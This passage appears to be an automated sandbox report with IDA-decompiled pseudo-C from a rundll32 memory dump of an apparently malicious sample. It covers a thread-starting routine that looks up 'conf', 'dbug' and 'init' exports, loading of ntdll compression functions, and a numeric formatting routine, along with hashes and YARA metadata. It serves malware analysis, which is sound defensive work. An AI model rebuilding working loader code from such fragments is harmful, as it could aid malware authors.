                                                            					}
                                                            				} else {
                                                            					if( *((intOrPtr*)(__ecx + 0x1c)) == 2) {
                                                            						_t57 =  *(__ecx + 0x2c);
                                                            						if( *(__ecx + 0x2c) != 0) {
                                                            							_t46 = E0463D260(_t57, "dbug");
                                                            							if(_t46 != 0) {
                                                            								 *_t46(1);
                                                            							}
                                                            						}
                                                            					}
                                                            					L5:
                                                            					return 1;
                                                            				}
                                                            			}
















                                                            0x0463e420
                                                            0x0463e421
                                                            0x0463e428
                                                            0x0463e451
                                                            0x0463e455
                                                            0x00000000
                                                            0x0463e457
                                                            0x0463e457
                                                            0x0463e45b
                                                            0x0463e45f
                                                            0x0463e467
                                                            0x0463e46e
                                                            0x0463e474
                                                            0x0463e474
                                                            0x0463e477
                                                            0x0463e47b
                                                            0x0463e548
                                                            0x0463e548
                                                            0x0463e54b
                                                            0x0463e481
                                                            0x0463e481
                                                            0x0463e483
                                                            0x0463e487
                                                            0x00000000
                                                            0x0463e48d
                                                            0x0463e48d
                                                            0x0463e490
                                                            0x0463e494
                                                            0x0463e498
                                                            0x0463e4a8
                                                            0x0463e4af
                                                            0x0463e4af
                                                            0x0463e4b4
                                                            0x0463e4b7
                                                            0x0463e4bb
                                                            0x00000000
                                                            0x0463e4c1
                                                            0x0463e4cb
                                                            0x0463e4cd
                                                            0x0463e4cf
                                                            0x0463e4df
                                                            0x0463e4df
                                                            0x0463e4ec
                                                            0x0463e4ec
                                                            0x0463e4fb
                                                            0x0463e4fd
                                                            0x0463e4ff
                                                            0x0463e507
                                                            0x0463e507
                                                            0x0463e509
                                                            0x0463e50d
                                                            0x0463e50f
                                                            0x0463e512
                                                            0x0463e514
                                                            0x0463e51b
                                                            0x0463e520
                                                            0x0463e522
                                                            0x0463e526
                                                            0x0463e526
                                                            0x0463e522
                                                            0x0463e514
                                                            0x0463e53c
                                                            0x0463e546
                                                            0x0463e546
                                                            0x0463e4bb
                                                            0x0463e487
                                                            0x0463e47b
                                                            0x0463e42a
                                                            0x0463e42e
                                                            0x0463e430
                                                            0x0463e435
                                                            0x0463e43c
                                                            0x0463e443
                                                            0x0463e447
                                                            0x0463e447
                                                            0x0463e443
                                                            0x0463e435
                                                            0x0463e449
                                                            0x0463e450
                                                            0x0463e450

                                                            APIs
                                                            • CreateThread.KERNEL32(00000000,00000000,0463E300,?,00000000,00000000), ref: 0463E536
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID: conf$dbug$init
                                                            • API String ID: 2422867632-3701578037
                                                            • Opcode ID: 9e1495f571618f62bfcf744cdbe060fcab70ff79b4ce25fc722a9497dbbb728c
                                                            • Instruction ID: b3d3f9b0d3516643a66f28ac5180dafd3bf53e3c196861e2606c44437bf152af
                                                            • Opcode Fuzzy Hash: 9e1495f571618f62bfcf744cdbe060fcab70ff79b4ce25fc722a9497dbbb728c
                                                            • Instruction Fuzzy Hash: 463181317007409FF730AF65D908B6A72E1AF98716F04496DE1468B781FBB2F845CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 34%
                                                            			E046392E0(void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				signed int _v9;
                                                            				struct _SECURITY_ATTRIBUTES* _v20;
                                                            				struct _SECURITY_ATTRIBUTES* _v21;
                                                            				struct _SECURITY_ATTRIBUTES* _v24;
                                                            				struct _SECURITY_ATTRIBUTES* _v25;
                                                            				struct _SECURITY_ATTRIBUTES* _v28;
                                                            				struct _SECURITY_ATTRIBUTES* _v29;
                                                            				struct _SECURITY_ATTRIBUTES* _v44;
                                                            				char _v48;
                                                            				struct _SECURITY_ATTRIBUTES* _v52;
                                                            				struct _SECURITY_ATTRIBUTES* _v56;
                                                            				intOrPtr _v60;
                                                            				intOrPtr _v61;
                                                            				struct _SECURITY_ATTRIBUTES* _v64;
                                                            				intOrPtr _v68;
                                                            				intOrPtr _v69;
                                                            				struct _SECURITY_ATTRIBUTES* _v72;
                                                            				intOrPtr _v73;
                                                            				struct _SECURITY_ATTRIBUTES* _v76;
                                                            				intOrPtr _v81;
                                                            				intOrPtr* _v92;
                                                            				char _v108;
                                                            				char _v109;
                                                            				void* _v112;
                                                            				void* _v113;
                                                            				char* _v116;
                                                            				char _v120;
                                                            				intOrPtr _v121;
                                                            				char _v124;
                                                            				signed int _t44;
                                                            				void* _t52;
                                                            				void** _t69;
                                                            				intOrPtr* _t71;
                                                            				intOrPtr _t72;
                                                            				signed int _t81;
                                                            				signed int _t83;
                                                            				signed int _t84;
                                                            
                                                            				_t83 = (_t81 & 0xfffffff8) - 0x7c;
                                                            				_t44 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t44 ^ _t83;
                                                            				E04637980( &_v108);
                                                            				_v68 = 0x467e048;
                                                            				_v64 = 0;
                                                            				_v60 = 0x467e024;
                                                            				_v56 = 0;
                                                            				_v20 = 0;
                                                            				_v28 = 0;
                                                            				_v24 = 0;
                                                            				_v44 = 0;
                                                            				_v76 = 0;
                                                            				_v72 = 0;
                                                            				_v52 = 0;
                                                            				_v48 = 0x43;
                                                            				E04638AE0( &_v108,  *0x46878d4 & 0x0000ffff);
                                                            				_t69 =  &_v112;
                                                            				_t84 = _t83 - 0xc;
                                                            				_push( *0x4684760 & 0x0000ffff);
                                                            				_push(0x46878d8);
                                                            				if(L04638BB0(_t69) != 0) {
                                                            					_v120 = 0x467e8b0;
                                                            					_v116 =  &_v108;
                                                            					_v52 =  &_v120;
                                                            					_t52 = CreateEventW(0, 1, 0, 0);
                                                            					_push(_t69);
                                                            					_push(0x3f);
                                                            					_v112 = _t52;
                                                            					_push(1);
                                                            					_push( &_v124);
                                                            					_v120 = 0x467ec8c;
                                                            					_v124 = 0x4a;
                                                            					E04631C60(_v116);
                                                            					_t71 = _v92;
                                                            					if(_t71 != 0) {
                                                            						 *((intOrPtr*)( *_t71 + 0x14))(0xffffffff);
                                                            					}
                                                            					_t72 = _v73;
                                                            					if(_t72 != 0) {
                                                            						 *((intOrPtr*)( *((intOrPtr*)(_t72 + 4)) + 0x14))(0xffffffff);
                                                            					}
                                                            					_v121 = 0x467e8b0;
                                                            					CloseHandle(_v113);
                                                            					_v121 = 0x467e8c0;
                                                            				}
                                                            				E04638C90( &_v109);
                                                            				_t57 = _v29;
                                                            				if(_v29 != 0) {
                                                            					L04655B0F(_t57);
                                                            					_t84 = _t84 + 4;
                                                            				}
                                                            				_t58 = _v81;
                                                            				_v21 = 0;
                                                            				_v29 = 0;
                                                            				_v25 = 0;
                                                            				_v61 = 0x467df88;
                                                            				_v69 = 0x467e008;
                                                            				if(_v81 != 0) {
                                                            					L04655B0F(_t58);
                                                            					_t84 = _t84 + 4;
                                                            				}
                                                            				return E04655AFE(_v9 ^ _t84);
                                                            			}









































                                                            0x046392e6
                                                            0x046392e9
                                                            0x046392f0
                                                            0x04639300
                                                            0x0463930a
                                                            0x04639312
                                                            0x0463931a
                                                            0x04639322
                                                            0x0463932a
                                                            0x04639332
                                                            0x0463933a
                                                            0x04639342
                                                            0x0463934a
                                                            0x04639352
                                                            0x0463935a
                                                            0x04639362
                                                            0x04639367
                                                            0x04639373
                                                            0x04639377
                                                            0x0463937a
                                                            0x0463937b
                                                            0x04639387
                                                            0x04639399
                                                            0x046393a1
                                                            0x046393ad
                                                            0x046393b1
                                                            0x046393b7
                                                            0x046393bc
                                                            0x046393be
                                                            0x046393c6
                                                            0x046393c8
                                                            0x046393c9
                                                            0x046393d1
                                                            0x046393d6
                                                            0x046393db
                                                            0x046393e1
                                                            0x046393e7
                                                            0x046393e7
                                                            0x046393ea
                                                            0x046393f0
                                                            0x046393fa
                                                            0x046393fa
                                                            0x04639403
                                                            0x0463940b
                                                            0x04639411
                                                            0x04639411
                                                            0x0463941d
                                                            0x04639422
                                                            0x04639428
                                                            0x0463942b
                                                            0x04639430
                                                            0x04639430
                                                            0x04639433
                                                            0x04639437
                                                            0x0463943f
                                                            0x04639447
                                                            0x0463944f
                                                            0x04639457
                                                            0x04639461
                                                            0x04639464
                                                            0x04639469
                                                            0x04639469
                                                            0x0463947d

                                                            APIs
                                                              • Part of subcall function 04637980: LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,00000000,0464B836), ref: 046379B0
                                                              • Part of subcall function 04637980: GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 046379C2
                                                              • Part of subcall function 04637980: GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 046379D5
                                                              • Part of subcall function 04637980: GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 046379E8
                                                            • CreateEventW.KERNEL32(00000000,00000001), ref: 046393B1
                                                            • CloseHandle.KERNEL32(0467E8B0,00000000,00000001,0000003F), ref: 0463940B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$CloseCreateEventHandleLibraryLoad
                                                            • String ID: C$J
                                                            • API String ID: 1850149996-3934036899
                                                            • Opcode ID: f9dd382b47fb2d2b4c1a59a4d1b60cccd6a2ec14e46c4259e475a382c89f4488
                                                            • Instruction ID: 3882cebe4cdebdc203a61ea26b39eb771e9d5010af90aab6c1927ce0be656a7b
                                                            • Opcode Fuzzy Hash: f9dd382b47fb2d2b4c1a59a4d1b60cccd6a2ec14e46c4259e475a382c89f4488
                                                            • Instruction Fuzzy Hash: CC4128B15083819BE310DF64C458B1BBBE4AF91709F100A1DF5A19A2A0EBB5E508CF97
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 75%
                                                            			E0466B2BC(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				signed int _v16;
                                                            				unsigned int _v20;
                                                            				signed int _v28;
                                                            				signed int _v32;
                                                            				signed int _v36;
                                                            				char _v40;
                                                            				intOrPtr _v48;
                                                            				char _v52;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* _t86;
                                                            				signed int _t92;
                                                            				signed int _t93;
                                                            				signed int _t94;
                                                            				signed int _t100;
                                                            				void* _t101;
                                                            				void* _t102;
                                                            				void* _t104;
                                                            				void* _t107;
                                                            				void* _t109;
                                                            				void* _t111;
                                                            				void* _t115;
                                                            				char* _t116;
                                                            				void* _t119;
                                                            				signed int _t121;
                                                            				signed int _t128;
                                                            				signed int* _t129;
                                                            				signed int _t136;
                                                            				signed int _t137;
                                                            				char _t138;
                                                            				signed int _t139;
                                                            				signed int _t142;
                                                            				signed int _t146;
                                                            				signed int _t151;
                                                            				char _t156;
                                                            				char _t157;
                                                            				void* _t161;
                                                            				unsigned int _t162;
                                                            				signed int _t164;
                                                            				signed int _t166;
                                                            				signed int _t170;
                                                            				void* _t171;
                                                            				signed int* _t172;
                                                            				signed int _t174;
                                                            				signed int _t181;
                                                            				signed int _t182;
                                                            				signed int _t183;
                                                            				signed int _t184;
                                                            				signed int _t185;
                                                            				signed int _t186;
                                                            				signed int _t187;
                                                            
                                                            				_t171 = __edx;
                                                            				_t181 = _a24;
                                                            				if(_t181 < 0) {
                                                            					_t181 = 0;
                                                            				}
                                                            				_t184 = _a8;
                                                            				 *_t184 = 0;
                                                            				E0465EF84(0,  &_v52, _t171, _a36);
                                                            				_t5 = _t181 + 0xb; // 0xb
                                                            				if(_a12 > _t5) {
                                                            					_t172 = _a4;
                                                            					_t142 = _t172[1];
                                                            					_v36 =  *_t172;
                                                            					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                                                            					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                                                            						L11:
                                                            						__eflags = _t142 & 0x80000000;
                                                            						if((_t142 & 0x80000000) != 0) {
                                                            							 *_t184 = 0x2d;
                                                            							_t184 = _t184 + 1;
                                                            							__eflags = _t184;
                                                            						}
                                                            						__eflags = _a28;
                                                            						_v16 = 0x3ff;
                                                            						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                                                            						__eflags = _t172[1] & 0x7ff00000;
                                                            						_v32 = _t136;
                                                            						_t86 = 0x30;
                                                            						if((_t172[1] & 0x7ff00000) != 0) {
                                                            							 *_t184 = 0x31;
                                                            							_t185 = _t184 + 1;
                                                            							__eflags = _t185;
                                                            						} else {
                                                            							 *_t184 = _t86;
                                                            							_t185 = _t184 + 1;
                                                            							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                                                            							__eflags = _t164;
                                                            							if(_t164 != 0) {
                                                            								_v16 = 0x3fe;
                                                            							} else {
                                                            								_v16 = _v16 & _t164;
                                                            							}
                                                            						}
                                                            						_t146 = _t185;
                                                            						_t186 = _t185 + 1;
                                                            						_v28 = _t146;
                                                            						__eflags = _t181;
                                                            						if(_t181 != 0) {
                                                            							_t30 = _v48 + 0x88; // 0xffce8305
                                                            							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
                                                            						} else {
                                                            							 *_t146 = 0;
                                                            						}
                                                            						_t92 = _t172[1] & 0x000fffff;
                                                            						__eflags = _t92;
                                                            						_v20 = _t92;
                                                            						if(_t92 > 0) {
                                                            							L23:
                                                            							_t33 =  &_v8;
                                                            							 *_t33 = _v8 & 0x00000000;
                                                            							__eflags =  *_t33;
                                                            							_t147 = 0xf0000;
                                                            							_t93 = 0x30;
                                                            							_v12 = _t93;
                                                            							_v20 = 0xf0000;
                                                            							do {
                                                            								__eflags = _t181;
                                                            								if(_t181 <= 0) {
                                                            									break;
                                                            								}
                                                            								_t119 = E04671A30( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                            								_t161 = 0x30;
                                                            								_t121 = _t119 + _t161 & 0x0000ffff;
                                                            								__eflags = _t121 - 0x39;
                                                            								if(_t121 > 0x39) {
                                                            									_t121 = _t121 + _t136;
                                                            									__eflags = _t121;
                                                            								}
                                                            								_t162 = _v20;
                                                            								_t172 = _a4;
                                                            								 *_t186 = _t121;
                                                            								_t186 = _t186 + 1;
                                                            								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                                                            								_t147 = _t162 >> 4;
                                                            								_t93 = _v12 - 4;
                                                            								_t181 = _t181 - 1;
                                                            								_v20 = _t162 >> 4;
                                                            								_v12 = _t93;
                                                            								__eflags = _t93;
                                                            							} while (_t93 >= 0);
                                                            							__eflags = _t93;
                                                            							if(_t93 < 0) {
                                                            								goto L39;
                                                            							}
                                                            							_t115 = E04671A30( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                            							__eflags = _t115 - 8;
                                                            							if(_t115 <= 8) {
                                                            								goto L39;
                                                            							}
                                                            							_t54 = _t186 - 1; // 0x2
                                                            							_t116 = _t54;
                                                            							_t138 = 0x30;
                                                            							while(1) {
                                                            								_t156 =  *_t116;
                                                            								__eflags = _t156 - 0x66;
                                                            								if(_t156 == 0x66) {
                                                            									goto L33;
                                                            								}
                                                            								__eflags = _t156 - 0x46;
                                                            								if(_t156 != 0x46) {
                                                            									_t139 = _v32;
                                                            									__eflags = _t116 - _v28;
                                                            									if(_t116 == _v28) {
                                                            										_t57 = _t116 - 1;
                                                            										 *_t57 =  *(_t116 - 1) + 1;
                                                            										__eflags =  *_t57;
                                                            									} else {
                                                            										_t157 =  *_t116;
                                                            										__eflags = _t157 - 0x39;
                                                            										if(_t157 != 0x39) {
                                                            											 *_t116 = _t157 + 1;
                                                            										} else {
                                                            											 *_t116 = _t139 + 0x3a;
                                                            										}
                                                            									}
                                                            									goto L39;
                                                            								}
                                                            								L33:
                                                            								 *_t116 = _t138;
                                                            								_t116 = _t116 - 1;
                                                            							}
                                                            						} else {
                                                            							__eflags =  *_t172;
                                                            							if( *_t172 <= 0) {
                                                            								L39:
                                                            								__eflags = _t181;
                                                            								if(_t181 > 0) {
                                                            									_push(_t181);
                                                            									_t111 = 0x30;
                                                            									_push(_t111);
                                                            									_push(_t186);
                                                            									E0465DEA0(_t181);
                                                            									_t186 = _t186 + _t181;
                                                            									__eflags = _t186;
                                                            								}
                                                            								_t94 = _v28;
                                                            								__eflags =  *_t94;
                                                            								if( *_t94 == 0) {
                                                            									_t186 = _t94;
                                                            								}
                                                            								__eflags = _a28;
                                                            								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                            								_t174 = _a4[1];
                                                            								_t100 = E04671A30( *_a4, 0x34, _t174);
                                                            								_t137 = 0;
                                                            								_t151 = (_t100 & 0x000007ff) - _v16;
                                                            								__eflags = _t151;
                                                            								asm("sbb ebx, ebx");
                                                            								if(__eflags < 0) {
                                                            									L47:
                                                            									 *(_t186 + 1) = 0x2d;
                                                            									_t187 = _t186 + 2;
                                                            									__eflags = _t187;
                                                            									_t151 =  ~_t151;
                                                            									asm("adc ebx, 0x0");
                                                            									_t137 =  ~_t137;
                                                            									goto L48;
                                                            								} else {
                                                            									if(__eflags > 0) {
                                                            										L46:
                                                            										 *(_t186 + 1) = 0x2b;
                                                            										_t187 = _t186 + 2;
                                                            										L48:
                                                            										_t182 = _t187;
                                                            										_t101 = 0x30;
                                                            										 *_t187 = _t101;
                                                            										__eflags = _t137;
                                                            										if(__eflags < 0) {
                                                            											L56:
                                                            											__eflags = _t187 - _t182;
                                                            											if(_t187 != _t182) {
                                                            												L60:
                                                            												_push(0);
                                                            												_push(0xa);
                                                            												_push(_t137);
                                                            												_push(_t151);
                                                            												_t102 = E046718F0();
                                                            												_v32 = _t174;
                                                            												 *_t187 = _t102 + 0x30;
                                                            												_t187 = _t187 + 1;
                                                            												__eflags = _t187;
                                                            												L61:
                                                            												_t104 = 0x30;
                                                            												_t183 = 0;
                                                            												__eflags = 0;
                                                            												 *_t187 = _t151 + _t104;
                                                            												 *(_t187 + 1) = 0;
                                                            												goto L62;
                                                            											}
                                                            											__eflags = _t137;
                                                            											if(__eflags < 0) {
                                                            												goto L61;
                                                            											}
                                                            											if(__eflags > 0) {
                                                            												goto L60;
                                                            											}
                                                            											__eflags = _t151 - 0xa;
                                                            											if(_t151 < 0xa) {
                                                            												goto L61;
                                                            											}
                                                            											goto L60;
                                                            										}
                                                            										if(__eflags > 0) {
                                                            											L51:
                                                            											_push(0);
                                                            											_push(0x3e8);
                                                            											_push(_t137);
                                                            											_push(_t151);
                                                            											_t107 = E046718F0();
                                                            											_v32 = _t174;
                                                            											 *_t187 = _t107 + 0x30;
                                                            											_t187 = _t187 + 1;
                                                            											__eflags = _t187 - _t182;
                                                            											if(_t187 != _t182) {
                                                            												L55:
                                                            												_push(0);
                                                            												_push(0x64);
                                                            												_push(_t137);
                                                            												_push(_t151);
                                                            												_t109 = E046718F0();
                                                            												_v32 = _t174;
                                                            												 *_t187 = _t109 + 0x30;
                                                            												_t187 = _t187 + 1;
                                                            												__eflags = _t187;
                                                            												goto L56;
                                                            											}
                                                            											L52:
                                                            											__eflags = _t137;
                                                            											if(__eflags < 0) {
                                                            												goto L56;
                                                            											}
                                                            											if(__eflags > 0) {
                                                            												goto L55;
                                                            											}
                                                            											__eflags = _t151 - 0x64;
                                                            											if(_t151 < 0x64) {
                                                            												goto L56;
                                                            											}
                                                            											goto L55;
                                                            										}
                                                            										__eflags = _t151 - 0x3e8;
                                                            										if(_t151 < 0x3e8) {
                                                            											goto L52;
                                                            										}
                                                            										goto L51;
                                                            									}
                                                            									__eflags = _t151;
                                                            									if(_t151 < 0) {
                                                            										goto L47;
                                                            									}
                                                            									goto L46;
                                                            								}
                                                            							}
                                                            							goto L23;
                                                            						}
                                                            					}
                                                            					__eflags = 0;
                                                            					if(0 != 0) {
                                                            						goto L11;
                                                            					} else {
                                                            						_t183 = E0466B5BF(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                                                            						__eflags = _t183;
                                                            						if(_t183 == 0) {
                                                            							_t128 = E0465DA60(_t184, 0x65);
                                                            							_pop(_t166);
                                                            							__eflags = _t128;
                                                            							if(_t128 != 0) {
                                                            								__eflags = _a28;
                                                            								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                            								__eflags = _t170;
                                                            								 *_t128 = _t170;
                                                            								 *((char*)(_t128 + 3)) = 0;
                                                            							}
                                                            							_t183 = 0;
                                                            						} else {
                                                            							 *_t184 = 0;
                                                            						}
                                                            						goto L62;
                                                            					}
                                                            				} else {
                                                            					_t129 = E04661772();
                                                            					_t183 = 0x22;
                                                            					 *_t129 = _t183;
                                                            					E0465EEE6();
                                                            					L62:
                                                            					if(_v40 != 0) {
                                                            						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                                                            					}
                                                            					return _t183;
                                                            				}
                                                            			}
























































                                                            0x0466b2bc
                                                            0x0466b2c7
                                                            0x0466b2ce
                                                            0x0466b2d0
                                                            0x0466b2d0
                                                            0x0466b2d2
                                                            0x0466b2db
                                                            0x0466b2dd
                                                            0x0466b2e2
                                                            0x0466b2e8
                                                            0x0466b2fe
                                                            0x0466b303
                                                            0x0466b306
                                                            0x0466b313
                                                            0x0466b318
                                                            0x0466b36c
                                                            0x0466b374
                                                            0x0466b376
                                                            0x0466b378
                                                            0x0466b37b
                                                            0x0466b37b
                                                            0x0466b37b
                                                            0x0466b381
                                                            0x0466b389
                                                            0x0466b39c
                                                            0x0466b39f
                                                            0x0466b3a1
                                                            0x0466b3a4
                                                            0x0466b3a5
                                                            0x0466b3c6
                                                            0x0466b3c9
                                                            0x0466b3c9
                                                            0x0466b3a7
                                                            0x0466b3a7
                                                            0x0466b3a9
                                                            0x0466b3b4
                                                            0x0466b3b4
                                                            0x0466b3b6
                                                            0x0466b3bd
                                                            0x0466b3b8
                                                            0x0466b3b8
                                                            0x0466b3b8
                                                            0x0466b3b6
                                                            0x0466b3ca
                                                            0x0466b3cc
                                                            0x0466b3cd
                                                            0x0466b3d0
                                                            0x0466b3d2
                                                            0x0466b3dc
                                                            0x0466b3e6
                                                            0x0466b3d4
                                                            0x0466b3d4
                                                            0x0466b3d4
                                                            0x0466b3eb
                                                            0x0466b3eb
                                                            0x0466b3f0
                                                            0x0466b3f3
                                                            0x0466b3fe
                                                            0x0466b3fe
                                                            0x0466b3fe
                                                            0x0466b3fe
                                                            0x0466b402
                                                            0x0466b409
                                                            0x0466b40a
                                                            0x0466b40d
                                                            0x0466b410
                                                            0x0466b410
                                                            0x0466b412
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b42a
                                                            0x0466b431
                                                            0x0466b435
                                                            0x0466b438
                                                            0x0466b43b
                                                            0x0466b43d
                                                            0x0466b43d
                                                            0x0466b43d
                                                            0x0466b43f
                                                            0x0466b442
                                                            0x0466b445
                                                            0x0466b447
                                                            0x0466b44f
                                                            0x0466b455
                                                            0x0466b458
                                                            0x0466b45b
                                                            0x0466b45c
                                                            0x0466b45f
                                                            0x0466b462
                                                            0x0466b462
                                                            0x0466b467
                                                            0x0466b46a
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b482
                                                            0x0466b487
                                                            0x0466b48b
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b48f
                                                            0x0466b48f
                                                            0x0466b492
                                                            0x0466b493
                                                            0x0466b493
                                                            0x0466b495
                                                            0x0466b498
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b49a
                                                            0x0466b49d
                                                            0x0466b4a4
                                                            0x0466b4a7
                                                            0x0466b4aa
                                                            0x0466b4c0
                                                            0x0466b4c0
                                                            0x0466b4c0
                                                            0x0466b4ac
                                                            0x0466b4ac
                                                            0x0466b4ae
                                                            0x0466b4b1
                                                            0x0466b4bc
                                                            0x0466b4b3
                                                            0x0466b4b6
                                                            0x0466b4b6
                                                            0x0466b4b1
                                                            0x00000000
                                                            0x0466b4aa
                                                            0x0466b49f
                                                            0x0466b49f
                                                            0x0466b4a1
                                                            0x0466b4a1
                                                            0x0466b3f5
                                                            0x0466b3f5
                                                            0x0466b3f8
                                                            0x0466b4c3
                                                            0x0466b4c3
                                                            0x0466b4c5
                                                            0x0466b4c7
                                                            0x0466b4ca
                                                            0x0466b4cb
                                                            0x0466b4cc
                                                            0x0466b4cd
                                                            0x0466b4d5
                                                            0x0466b4d5
                                                            0x0466b4d5
                                                            0x0466b4d7
                                                            0x0466b4da
                                                            0x0466b4dd
                                                            0x0466b4df
                                                            0x0466b4df
                                                            0x0466b4e1
                                                            0x0466b4f3
                                                            0x0466b4f7
                                                            0x0466b4fa
                                                            0x0466b501
                                                            0x0466b509
                                                            0x0466b509
                                                            0x0466b50c
                                                            0x0466b50e
                                                            0x0466b51f
                                                            0x0466b51f
                                                            0x0466b523
                                                            0x0466b523
                                                            0x0466b526
                                                            0x0466b528
                                                            0x0466b52b
                                                            0x00000000
                                                            0x0466b510
                                                            0x0466b510
                                                            0x0466b516
                                                            0x0466b516
                                                            0x0466b51a
                                                            0x0466b52d
                                                            0x0466b52d
                                                            0x0466b531
                                                            0x0466b532
                                                            0x0466b534
                                                            0x0466b536
                                                            0x0466b577
                                                            0x0466b577
                                                            0x0466b579
                                                            0x0466b586
                                                            0x0466b586
                                                            0x0466b588
                                                            0x0466b58a
                                                            0x0466b58b
                                                            0x0466b58c
                                                            0x0466b593
                                                            0x0466b596
                                                            0x0466b598
                                                            0x0466b598
                                                            0x0466b599
                                                            0x0466b59b
                                                            0x0466b59e
                                                            0x0466b59e
                                                            0x0466b5a0
                                                            0x0466b5a2
                                                            0x00000000
                                                            0x0466b5a2
                                                            0x0466b57b
                                                            0x0466b57d
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b57f
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b581
                                                            0x0466b584
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b584
                                                            0x0466b53d
                                                            0x0466b543
                                                            0x0466b543
                                                            0x0466b545
                                                            0x0466b546
                                                            0x0466b547
                                                            0x0466b548
                                                            0x0466b54f
                                                            0x0466b552
                                                            0x0466b554
                                                            0x0466b555
                                                            0x0466b557
                                                            0x0466b564
                                                            0x0466b564
                                                            0x0466b566
                                                            0x0466b568
                                                            0x0466b569
                                                            0x0466b56a
                                                            0x0466b571
                                                            0x0466b574
                                                            0x0466b576
                                                            0x0466b576
                                                            0x00000000
                                                            0x0466b576
                                                            0x0466b559
                                                            0x0466b559
                                                            0x0466b55b
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b55d
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b55f
                                                            0x0466b562
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b562
                                                            0x0466b53f
                                                            0x0466b541
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b541
                                                            0x0466b512
                                                            0x0466b514
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b514
                                                            0x0466b50e
                                                            0x00000000
                                                            0x0466b3f8
                                                            0x0466b3f3
                                                            0x0466b31a
                                                            0x0466b31c
                                                            0x00000000
                                                            0x0466b31e
                                                            0x0466b334
                                                            0x0466b339
                                                            0x0466b33b
                                                            0x0466b347
                                                            0x0466b34d
                                                            0x0466b34e
                                                            0x0466b350
                                                            0x0466b352
                                                            0x0466b35d
                                                            0x0466b35d
                                                            0x0466b360
                                                            0x0466b362
                                                            0x0466b362
                                                            0x0466b365
                                                            0x0466b33d
                                                            0x0466b33d
                                                            0x0466b33d
                                                            0x00000000
                                                            0x0466b33b
                                                            0x0466b2ea
                                                            0x0466b2ea
                                                            0x0466b2f1
                                                            0x0466b2f2
                                                            0x0466b2f4
                                                            0x0466b5a6
                                                            0x0466b5aa
                                                            0x0466b5af
                                                            0x0466b5af
                                                            0x0466b5be
                                                            0x0466b5be

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: 56d7df094b96d399631f2e70f396444e24e0827d77f7372ca130cc79345a1ebe
                                                            • Instruction ID: a1e33af52e576496e40abe470cdb8630258f4887fd5ba6924e86da27d75f2c77
                                                            • Opcode Fuzzy Hash: 56d7df094b96d399631f2e70f396444e24e0827d77f7372ca130cc79345a1ebe
                                                            • Instruction Fuzzy Hash: AEA14671A003A6DFEB21CF28C8907AEBBA6EF65750F18416DD996DB381E234B941C750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 81%
